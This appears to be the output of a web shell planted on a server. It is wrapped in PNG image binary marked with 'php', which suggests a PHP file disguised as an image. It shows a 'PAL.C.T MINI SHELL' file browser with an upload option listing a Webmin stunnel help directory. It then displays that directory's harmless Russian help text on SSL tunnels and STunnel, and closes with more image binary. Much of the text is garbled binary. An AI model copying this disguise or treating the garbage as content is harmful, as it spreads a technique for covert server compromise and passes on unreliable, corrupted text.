php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.ru.auto.html

<header> Введение в туннели SSL </header> SSL - это протокол для шифрования данных в TCP-соединении, когда оно передается по сети. Первоначально он был разработан для защиты трафика между веб-браузерами и серверами, но может использоваться для шифрования любого типа потока данных, который обычно отправляется по протоколу TCP. <p> Протокол SSL позволяет клиентам и серверам аутентифицировать себя друг для друга, так что клиент может быть уверен, что он действительно подключается к хосту, который он считает. Это делается с использованием сертификатов, которые выдаются центром сертификации, распознаваемым клиентом (чтобы их можно было проверить) и связанным с конкретным именем хоста. Без сертификатов злоумышленник может перенаправить SSL-соединение на свой собственный сервер и получить конфиденциальную информацию от клиента, который считает, что он общается с реальным сервером. <p> Любые данные, которые передаются через Интернет без шифрования, могут быть захвачены и прочитаны злоумышленником с доступом к одной из сетей, через которые он проходит. Даже данные, передаваемые между клиентской и серверной системами в локальной сети, могут легко прослушиваться. Когда вы подключаетесь к серверу telnet, FTP или POP3, ваш пароль передается по сети и, таким образом, может быть перехвачен злоумышленником. <p> SSL может использоваться для защиты данных в подобных ситуациях, но только в том случае, если его поддерживают и клиент, и сервер. Большинство веб-браузеров и почтовых клиентов могут устанавливать HTTP, POP3 и IMAP-подключения с шифрованием SSL, но не все веб-серверы и POP3-серверы могут их принимать. POP3, в частности, трудно защитить, потому что стандартный сервер, который поставляется с большинством систем Unix, вообще не поддерживает SSL. К счастью, есть решение - STunnel. <p> STunnel - это простая программа, которая преобразует незашифрованное соединение в соединение с шифрованием SSL. Обычно он настроен на запуск с супер-сервера, такого как inetd или xinetd, а затем запускает какую-то другую программу, например сервер POP3, которая не поддерживает SSL. Такая конструкция позволяет защитить любой сервер, который обычно запускается из inetd, например серверы telnet, NNTP и IMAP. <p> Однако не все серверы могут быть эффективно защищены с помощью шифрования, поскольку не существует ни одного клиента для использования их в режиме SSL. Например, я никогда не слышал о клиенте telnet или FTP, который может использовать SSL, потому что общий пакет SSH уже позволяет зашифрованные удаленные входы и передачи файлов. <p> Этот модуль Webmin позволяет легко настроить суперсерверные сервисы, которые запускают STunnel для запуска некоторой серверной программы. Несмотря на то, что это можно сделать вручную с помощью модуля Internet Services, он специально предназначен для настройки и настройки STunnel. Он автоматически определяет, установлены ли у вас inetd и / или xinetd, считывает их конфигурации для проверки существующих туннелей SSL и добавляет их при создании нового туннеля. Если оба установлены, новые туннели SSL добавляются в конфигурацию xinetd, так как, по моему мнению, они превосходят оба. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`